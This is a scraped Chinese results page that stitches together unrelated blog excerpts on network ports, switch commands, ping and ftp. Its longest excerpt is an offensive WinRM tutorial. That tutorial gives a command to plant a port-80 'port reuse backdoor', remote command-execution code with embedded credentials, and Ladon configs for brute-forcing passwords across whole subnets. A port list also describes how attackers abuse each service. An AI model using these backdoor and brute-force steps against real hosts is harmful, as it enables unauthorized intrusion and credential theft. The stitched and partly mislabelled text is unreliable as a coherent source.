精华内容
下载资源
问答
  • 2018-05-06 00:46:34

    1、python模拟端口解决防火请验证问题

    如果生产环境中验证防火墙时对方服务却没启动,这时候使用python命令模拟端口则是十分有效的,例如远端IP为192.168.0.100,在远端服务器上执行下面命令


    python -m SimpleHTTPServer PORT


    PORT为远端服务的端口,例如这边假设是8080


    然后再该端测试远端端口时候开通防火墙


    telnet 192.168.0.100 8080


    2、python启动mini WEB服务

    在linux系统想要共享文件,使用python命名是十分便捷的(假设服务器IP为192.168.0.100)


    例如在想要共享文件的文件夹/data/resource下,执行下面命令


    python -m SimpleHTTPServer 8080


    这样我们就可以在浏览器访问http://192.168.0.100:8080,访问/data/resource下的文件了

    更多相关内容
  • 原标题:教大家查看华为交换机端口状态的方法以及命令华为交换机怎么打开端口?登录进交换机,进入系统视图,命令为:system-view。2、进入以太网端口视图,命令格式: interface interface-type interface-number。 ...

    原标题:教大家查看华为交换机端口状态的方法以及命令

    华为交换机怎么打开端口?

    登录进交换机,进入系统视图,命令为:system-view。2、进入以太网端口视图,命令格式: interface interface-type interface-number。

    华为交换机查看端口状态的方法

    1>将交换机开机,电脑连接后,进入用户模式;

    2>输入“enable"或”en“,进入特权模式;

    3>在特权模式下,输入”showinterfacef0/1“或”showintf0/1“,可查看f0/1接口的信息;

    4>在接口信息中相关信息较多,包括接口是否启用(upordown),该接口的MAC地址,该接口是全双工还是半双工(Full-duplexorHalf-duplex),这里的f0/1的接口是处于启用状态(up),并处于全双工(Full-duplex);

    5>我们再查看f0/2的接口信息,输入”showintf0/2“,这里的f0/2的接口是处于关闭状态(down),并处于半双工(Half-duplex);

    华为交换机查看端口状态的命令及说明

    current state 端口当前状态:DOWN表示端口处于关闭状态,UP表示端口处于打开状态;

    Last 300 seconds input rate:端口在前5分钟接收的字节速率和报文速率;

    Port Mode端口的工作模式:COMMON COPPER是电口模式,COMMON FIBER是光口模式;

    Last 300 seconds output rate:端口在前5分钟发送的字节速率和报文速率;

    Switch Port:显示端口是二层端口,如果端口是三层端口,此处则显示为Route Port;

    Input peak rate 0:入端口报文的最大速率和最大速率的发生时间;

    Line protocol current state端口的链路协议状态:DOWN表示端口链路协议层有故障或者此端口没有配置IP地址,UP表示端口链路协议处于正常启动状态;

    Output peak rate 0:出端口报文的最大速率和最大速率的发生时间;

    Deion:端口的描述信息;

    Input:接收报文总数量,Output是发送报文总数量;

    Mdi:端口的网线类型;

    Discard:端口在物理层检测时发现的丢弃报文数目;

    Hardware address:设备的MAC地址;

    Total Error:端口在物理层检测时发现的错误报文总数目;

    PVID:端口的缺省VLAN的编号;

    CRC :端口接收的CRC错误报文数目;

    Speed;端口当前速度;

    DropEvents:端口接收的报文因为内存池满(GBP full)或者反压(Back Pressure)导致的丢包数目率;

    Duplex端口工作的双工模式:FULL是全双工模式,HALF是半双工模式;

    Alignments:端口接收的帧对齐错误的报文数目;

    TPID显示端口支持的帧类型:缺省情况下,TPID是0x8100,表示802.1Q帧(此字段只有在端口类型是二层端口情况下显示)

    Symbols:端口接收的编码错误的报文数目;

    The Maximum Frame Length:端口允许通过的最长帧;

    Buffers Purged:端口发送报文时在队列缓冲区中存在时间太长,被老化掉的报文数目;

    IP Sending Frames' Format IP协议发送帧格式:包括PKTFMT_ETHNT_2、Ethernet_802.3和Ethernet_SNAP;

    Input/Output bandwidth utilization threshold :输入/输出带宽占用率阈值;

    Negotiation端口自协商状态:ENABLE是端口开启了自协商功能,DISABLE是端口关闭了自协商功能;

    Loopback:端口环回配置;

    希望上次内容对您在使用交换机光模块连接有帮助! 返回搜狐,查看更多

    责任编辑:

    展开全文
  • 基于Web服务管理(WS-Management)标准,使用80端口或者443端口。这样一来,我们就可以在对方有设置防火墙的情况下远程管理这台服务器了。 Server2008R2及往上的系统中默认中都开启该服务,从Server2012系统后开始,该...

    简介

    WinRM是WindowsRemoteManagementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80端口或者443端口。这样一来,我们就可以在对方有设置防火墙的情况下远程管理这台服务器了。

    Server2008R2及往上的系统中默认中都开启该服务,从Server2012系统后开始,该WinRM服务便被设置为默认开启。Win7系统中却默认安装此WinRM服务,但是默认为禁用状态,Win8系统和Win10系统也都默认开启WinRM服务。

    PS:WIN7或2008需要手动开户WINRM

    默认端口

    5985/tcp (HTTP)
    5986/tcp (HTTPS)

    端口复用后门

    对于Windows Server 2012以上的服务器操作系统中,WinRM服务默认启动并监听了5985端口。
    通过下面的命令,可以新增WinRM一个80端口的监听。
    winrm set winrm/config/service @{EnableCompatibilityHttpListener=“true”}

    PS:该方法适用于有web的机器,不会开启新端口,也不需要EXE进程或DLL劫持。

    Winrs远程执行命令

    需要客户端启用Winrm,SYS权限受限制
    通过WinRM连接,并执行whoami命令
    winrs -r:http://192.168.1.20 -u:k8gege -p:k8gege520 whoami

    通过WinRM连接,并获得交互式的shell
    winrs -r:http://192.168.1.20 -u:k8gege -p:k8gege520 cmd

    PowerShell远程执行命令

    需要客户端启用Winrm,和系统自带命令一样,SYS权限受限制

    $ip="192.168.1.116"
    #$ip="192.168.1.20"
    Set-Item WSMan:\localhost\Client\TrustedHosts -Value $ip -Force
    $securePassword = ConvertTo-SecureString -AsPlainText -Force 'k8gege520' 
    $cred = New-Object System.Management.Automation.PSCredential 'k8gege', $securePassword
    $cmd = {ls C:\users\public}
    Invoke-Command -ComputerName $ip -Credential $cred -ScriptBlock $cmd
    

    Pywinrm远程执行命令

    需要客户端启用Winrm,和系统自带命令一样,SYS权限受限制

    #C:\Users\null\Desktop\pywinrm>python test1.py
    #win-\k8gege
    import winrm
    s=winrm.Session('http://192.168.1.116',auth=('k8gege','k8gege520'))#2012 ok
    #s=winrm.Session('http://192.168.1.20',auth=('k8gege','k8gege520'))#win7 fail
    r=s.run_ps('dir')
    r=s.run_cmd('whoami') 
    print r.std_out 
    print  r.std_err
    

    Gowinrm远程执行命令

    Go版不受权限限制,也不需要客户端启用Winrm,也不像系统自带winrs编码限制
    推荐使用版本,跨平台,任意权限,工具无需系统客外配置,也无需复杂安装。

    package main
    import (
      "github.com/masterzen/winrm"
      "fmt"
      "os"
      "strconv"
    )
    //Winrm Remote Shell by k8gege
    //http://k8gege.org/Ladon/WinrmScan.html
    #C:\Users\k8gege\Desktop\>winrmcmd.exe 192.168.1.116 5985 k8gege k8gege520 whoami
    #k8gege
    
    var help = func () {
        fmt.Println("Winrm Shell by k8gege")
        fmt.Println("====================================================")
        fmt.Println("winrmcmd host port user pass cmd")
    }
    
    func main() {
    
    	    args := os.Args
        if len(args) < 5 || args == nil {
    		help()
            return
        }
    	host := args[1]
    	port,err := strconv.Atoi(args[2])
    	user := args[3]
    	pass := args[4]
    	cmd := args[5]
    	
    	endpoint := winrm.NewEndpoint(host, port, false, false, nil, nil, nil, 0)
    	client, err := winrm.NewClient(endpoint, user, pass)
    	if err != nil {
    		panic(err)
    	}
    client.Run(cmd, os.Stdout, os.Stderr)
    }
    

    C#版远程执行命令

    有两种方法,一种WSMAN,一种DCOM,都有缺限,一个在WIN7环境运行提示无效程序(在2012系统才正常),另一个在WIN7开发环境正常在2012系统不能使用,再者需启用Winrm还一样受权限限制,还不如用系统自带命令好。

    调用winrm爆破

    由于C#使用WSMan来访问winrm均在各种问题,还不如系统自带命令winrs。
    当前机器为中文,目标为英文系统,连接提示编码问题,设置对应编码即可
    其它语言系统,返回不一定是437,具体自行根据需要修改INI脚本。

    WinrmScan.ini
    [Ladon]
    #Brute-Force WinRM
    exe=cmd.exe
    arg=/c "chcp 437 & winrs -r:http://$ip$:5985 -u:$user$ -p:$pass$ "echo isok""
    #exe=WinrmScan.exe
    #arg=$ip$ $user$ $pass$
    port=5985
    isok=isok
    log=true
    

    注意:INI脚本必须为ANSI编码,当前机器与目标必须启用WINRM,且放行5985端口
    后门:如果被别人添加了复用后门,也可以直接爆破80端口,把5985改成80即可。

    调用WinrmCmd爆破

    Go版不受权限限制,也不需要客户端启用Winrm,也不像系统自带winrs编码限制

    [Ladon]
    #Brute-Force WinRM
    exe=winrmcmd.exe
    arg=$ip$ 5985 $user$ $pass$ "echo isok""
    #exe=WinrmScan.exe
    #arg=$ip$ $user$ $pass$
    isok=isok
    log=true
    

    SSH密码爆破/暴力破解

    配置密码爆破参数

    INI脚本仅支持标准的user.txt和pass.txt帐密破解

    user & pass /传统帐密

    user.txt
    k8gege
    root

    pass.txt
    toor
    k8gege520

    指定IP

    Ladon 192.168.1.8 WinrmScan.ini
    

    扫描C段

    Ladon 192.168.1.8/c WinrmScan.ini
    Ladon 192.168.1.8/24 WinrmScan.ini
    

    扫描B段

    Ladon 192.168.1.8/b WinrmScan.ini
    

    扫描A段

    Ladon 192.168.1.8/a WinrmScan.ini
    

    批量IP

    ip.txt
    192.168.1.8
    192.168.1.5
    192.168.1.109:48

    Ladon WinrmScan.ini
    

    批量C段

    ip24.txt
    192.168.1.
    10.1.5.

    Ladon WinrmScan.ini
    

    批量B段

    ip16.txt
    192.168.
    10.1.

    Ladon  WinrmScan.ini
    

    如图,通过5985端口扫描1.20机器登陆口令
    image

    工具下载

    最新版本:https://k8gege.org/Download
    历史版本: https://github.com/k8gege/Ladon/releases
    WinrmCmd: https://github.com/k8gege/WinrmCmd

    展开全文
  • Ping命令和网络端口

    千次阅读 2019-07-18 17:40:24
    使用IPCONFIG命令可查看本机的IP地址,Ping IP地址,若Ping通,说明网络适配器(网卡或MODEM)工作正常,否则就不正常。 3.Ping同网段计算机IP地址 Ping 不通则说明网络线路出现故障,如网络中还...

    1.Ping 127.0.0.1 
    127.0.0.1是本地的循环地址,Ping通则说明TCP/IP协议工作正常,否则TCP/IP就不正常。

    2.Ping本机的IP地址 
    使用IPCONFIG命令可查看本机的IP地址,Ping IP地址,若Ping通,说明网络适配器(网卡或MODEM)工作正常,否则就不正常。

    3.Ping同网段计算机IP地址 
    Ping 不通则说明网络线路出现故障,如网络中还有路由器,则应先Ping路由器在本网段端口的IP地址,不通则此段线路有问题,通则再Ping路由器在目标计算机所在网段的端口IP地址,不通则路由出现故障,通再Ping目的机的IP地址。

    4.Ping网址 
    若要检测一下一个带DNS服务的网络(如Internet),在上一步Ping通了目标计算机的IP后,仍然无法连接到该机,则可以Ping机的网络名,正常情况下会出现该网址所指向的IP地址,这表明本机的DNS设置正确而且DNS服务器工作正常,反之就可能是其中之一出现了故障;同样也可以通过Ping计算机名检测WINS解析的故障(WINS是将计算机名解析到IP地址的服务。)。

    18 电脑端口基础知识 电脑端口基础知识 
    端口可分为3大类:

    1) 公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。

    2) 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。

    3) 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。

    本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住:并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣,请参看本文的其它部分。

    0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中”0”是无效端口,当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。

    1 tcpmux 这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户,如lp, guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux并利用这些帐户。

    7 Echo 你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。

    常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个机器的UDP数据包,而两个机器分别以它们最快的方式回应这些数据包。(参见Chargen)

    另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做”Resonate Global Dispatch”,它与DNS的这一端口连接以确定最近的路由。

    Harvest/squid cache将从3130端口发送UDP echo:”如果将cache的source_ping on选项打开,它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。

    11 sysstat 这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中”ps”命令的结果相似

    再说一遍:ICMP没有端口,ICMP port 11通常是ICMP type=11

    19 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时,会发送含有垃圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。

    21 ftp 最常见的攻击者用于寻找打开”anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或Crackers 利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。

    22 ssh PcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh)

    还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。

    UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632(十六进制的0x1600)位交换后是0我是猪头,我不该发广告016(使进制的22)。

    23 Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术,入侵者会找到密码。

    25 smtp 攻击者(spammer)寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽的e-mail服务器上,将简单的信息传递到不同的地址。SMTP服务器(尤其是sendmail)是进入系统的最常用方法之一,因为它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。

    53 DNS Hacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录53端口。

    需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。

    67和68 Bootp和DHCP UDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的”中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

    69 TFTP(UDP) 许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件,如密码文件。它们也可用于向系统写入文件。

    79 finger Hacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。 
     98 linuxconf 这个程序提供linux boxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuid root,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。此外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历遍目录等)

    109 POP2 并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样存在。 
     110 POP3 用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。

    111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常见RPC服务有:rpc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供服务的特定端口测试漏洞。

    记住一定要记录线路中的daemon, IDS, 或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。

    113 Ident auth 这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息(会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST,着将回停止这一缓慢的连接。

    119 NNTP news 新闻组传输协议,承载USENET通讯。当你链接到诸如:news://comp.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。

    135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper注册它们的位置。远端客户连接到机器时,它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运行Exchange Server吗?是什么版本?

    这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。

    137 NetBIOS name service nbtstat (UDP) 这是防火墙管理员最常见的信息,请仔细阅读文章后面的NetBIOS一节

    139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows”文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。

    大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些VBS(IE5 VisualBasic scrīpting)开始将它们自己拷贝到这个端口,试图在这个端口繁殖。

    143 IMAP 和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后,这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。

    这一端口还被用于IMAP2,但并不流行。

    已有一些报道发现有些0到143端口的攻击源于脚本。

    测试端口是否开放用telnet命令

    展开全文
  • 利用命令行启动tomcat

    千次阅读 2018-11-20 11:11:57
    但我们手动启动tomcat时,若果报错就会闪关,但是用命令行启动就可以清晰的找到错误的原因。 工具/原料 tomcat 方法/步骤 选择开始,输入cmd,回车,或者windows+r 输入cmd的快捷键 下载一个免安装版的tomcat...
  • 常见端口漏洞利用

    千次阅读 2021-03-05 08:38:38
    常见端口漏洞利用 快速扫描:Masscan -p80,800 ip --rate=10000   21/ FTP 匿名/暴力破解  拒绝服务 22/ SSH 暴力破解 23/ telnet Winbox(cve-2018-14847) 161/ snmp 弱口令  ...
  • 在Linux中利用Service命令添加系统服务及开机自启动

    万次阅读 多人点赞 2017-12-13 15:44:08
    近期由于做嵌入式项目需要...这里的command命令本身也是一个脚本。比如说:service networking start;中networking就是一个shell脚本。注意:这里的脚本没有文件后缀.sh。 接下来,将介绍如何做一个属于自己的serv...
  • 文章目录rsync安装sshpass安装rsync常用参数说明sshpass命令 免密登录,默认22端口 # sshpass -p password rsync -avz user@ip:/data/ /data/ 一行代码完事,免密登录,指定非22端口的其他端口号 # sshpass -p ...
  • NC反弹端口利用技巧

    千次阅读 2022-04-06 14:29:38
    把我们是HTTP simple启动该服务器http server回车那么这时候咱们就开始了一个服务器,并且它的根目录是在桌面的,所以说我们直接访问该机器的IP地址加上对应的这个800端口就可以下载到该shell。 同时我们也发现...
  • Windows命令之ftp命令

    千次阅读 2021-06-02 10:15:25
    在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。windows终端默认安装ftp客户端,我们可以通过ftp命令执行文件的上传和...
  • 利用139/445端口思路——永恒之蓝

    千次阅读 2020-05-30 19:48:37
    Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制...
  • 1433,3306,3389端口利用

    千次阅读 2018-04-13 11:06:22
    3389爆破说教程之前我们先说说3389端口是干嘛的:计算机的3389端口, 一般被用来代指远程桌面,可以被修改。它并不是一个木马程序,但如果不是必须的,建议关闭该服务。买过独立IP服务器的朋友都知道 3389 是默认...
  • 全网最优质的中兴设备命令大全

    千次阅读 2021-03-29 20:14:11
    今天给大家分享的是中兴网络设备的命令大全。花了一天的时间去找手册和整理、排版,希望对大家有用,觉得好的话还请点个赞,转发一下。 一、端口配置 端口基本配置 在中兴的设备上,可以对端口参数进行配置,如自动...
  • 怎样通过命令提示符打开端口

    千次阅读 2014-03-08 19:01:56
    怎样通过命令提示符打开端口  --------------------------------------------------------------------------------win本身大部分的端口应该都是开的吧,只能是关哪个端口。试试这片文章:查看端口在Windows 2000/...
  • linux—用nc命令监控检测服务器端口

    千次阅读 2015-11-02 13:38:38
    前端用apache htttpd进行发布(80端口),通过双机负载均衡转发到后端的两个tomcat进行处理(8081和8082端口), 现在需要随时监控这三个端口的情况,一旦down掉需要能够立即告警处理。...一、nc命令检测端口的用法
  • nc命令可以用来作为某些服务的检测,它可以连接到某个port进行通信 除此之外,它还可以自行启动一个port监听其它用户的连接 如果在编译nc软件的时候给予“GAPING_SECURITY_HOLE”参数的话,可以软件还可以用来...
  • 1.登陆linux系统,打开终端命令。输入 rpm -qa |grep ssh 查找当前系统是否已经安装 ...命令行输入 service sshd start 可以启动 或者输入systemctl start sshd亦可启动 Linux SSH服务启动 查看ssh服务启动状态
  • 如何查找出特定端口的使用情况以及对应的程序呢,针对该问题,本文介绍利用DOS命令查看占用特定端口的程序: 工具/原料 电脑一台(本文以win7系统的电脑为例,其它系统一样...
  • ftp常用命令

    万次阅读 多人点赞 2019-08-12 08:26:28
    在主动模式下:客户端给服务器端的21端口命令说,我要下载什么什么,并且还会说我已经打开了自己的20端口,你就从这里把东西给我吧,服务器收到后就会连接客户端已打开的20端口把东西传给客户端,这就是主动模式...
  • 利用ipc$和默认共享入侵远程电脑的过程 1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名" 一般通过扫描弱口令得到管理员帐号和密码 2. C:\> copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe...
  • 端口如何查看linux的端口

    千次阅读 2021-05-11 02:56:37
    lin ux查看端口的方法想查看TCP或者UDP端口使用情况使用netstat-anp如果有些进程看不见如只显示” -”可以尝试sudo netstat-anp如果想看某个端口的信息使用lsof命令如sudo lsof-i :631-bash-3.00#...
  • 利用ssh命令建立SOCKS5代理服务器

    万次阅读 2019-03-29 14:18:39
    对于那些想上网的人说这很方便 - 你...该ssh命令启动-D端口上的动态端口转发,1080并通过SOCSK5或SOCKS4协议与客户端通信,就像常规的SOCKS5代理一样!该-N选项确保ssh保持空闲状态,并且不在主机上执行任何命令...
  • 什么是Node.js 首先,很多人误以为它是一门新的语言,其实不是哈。 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行 环境,并不是一门新的语言。 通俗的理解: Node.js为JavaScript代码的正常运行,提供...
  • 你想知道为什么吗?因为我们使用图形用户界面。CMD用于命令行界面,也称为CLI。您必须键入这些命令才能完成任务。在此页面中,您将了解Windows中用于骇客的所有重要且前9个CMD命令。Windows CMD的这些命令也可以用于...
  • 启动应用的时候经常发现我们需要使用的端口被别的程序占用,但是我们又不知道是被谁占用,这时候我们需要找出占用端口的程序,如何做到呢? 1、开始---->运行---->cmd,或者是window+R组合键,调出命令窗口...
  • 各种服务器启动/停止/重启命令

    万次阅读 2019-06-29 16:10:50
    # 启动 # uwsgi --ini 配置文件路径 uwsgi --ini uwsgi.ini # 重启 pkill -f uwsgi # 停止 # uwsgi --stop 配置文件路径 uwsgi --stop uwsgi.ini Nginx # 启动Nginx sudo /usr/local/nginx/sbin/nginx # ...
  • 本节讲述了DVWA的命令注入漏洞,并通过对这个漏洞的利用,获取靶机的shell,完成入侵。
  • 网络设备基本配置命令

    千次阅读 多人点赞 2019-05-15 16:20:53
    (2)创建物理路由端口,将默认的二层交换端口切换为三层路由端口 (config-if)#no switchport (3)设置三层端口IP地址 (config-if)#ip address IP地址 子网掩码 (config-if)#no shutdown (config-if)#exit 二...
  • adb是什么?:adb的全称为Android Debug Bridge,就是起到调试桥的作用。通过adb我们可以在Eclipse中方面通过DDMS调试android程序,说白了就是debug工具。adb的工作方式比较特殊,采用监听Socket TCP 5554等...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 180,805
精华内容 72,322
关键字:

利用什么命令来启动端口